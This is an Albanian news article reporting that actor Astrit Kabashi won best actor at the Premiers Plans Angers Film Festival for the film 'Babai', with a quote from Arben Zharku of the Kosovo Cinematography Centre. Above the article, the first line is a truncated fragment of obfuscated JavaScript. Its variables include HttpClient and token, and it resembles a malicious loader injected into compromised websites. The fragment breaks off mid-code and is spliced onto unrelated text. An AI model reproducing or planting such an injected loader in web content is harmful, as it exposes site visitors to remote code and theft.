;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Vazhdojnë sukseset për kinematografinë kosovare, Astrit Kabashi më i miri në Francë!

By

Sukseset për kinematografinë kosovare duket se nuk po ndalen. Aktorët nga Kosova po vazhdojnë të marrin çmime kudo nëpër botë duke u vlerësuar për punën dhe talentin.

E arritja më e fundit është shënuar në Francë ku aktori Astrit Kabashi është zgjedhur si aktori më i mirë në festivalin Premiers Plans-Anger Film Festival në Francë.

Lajmin e ka bërë të ditur Drejtori i Qendrës Kinematografike të Kosovës, Arben Zharku përmes një postimi në Facebook.

“Edhe një lajm i mrekullueshëm për kinematografinë kosovare, Astrit Kabashi fiton si aktori më i mirë me filmin Babai në Premiers Plans-Angers Film Festival në Francë” – ka shkruar Zharku.

Filmi “Babai”, që rrëfimin e ka të vendosur në vitet e 90-ta në Kosovë tashmë është prezantuar në shumë festivale dhe ka marë shumë çmime ndërkombëtare. Në film me rolet e tyre pos Astrit Kabashit luajnë edhe Val Maloku, Aurita Agushi, Adriana Matoshi, Enver Petrovci, Alban Ukaj.

Artikuj të ngjashëm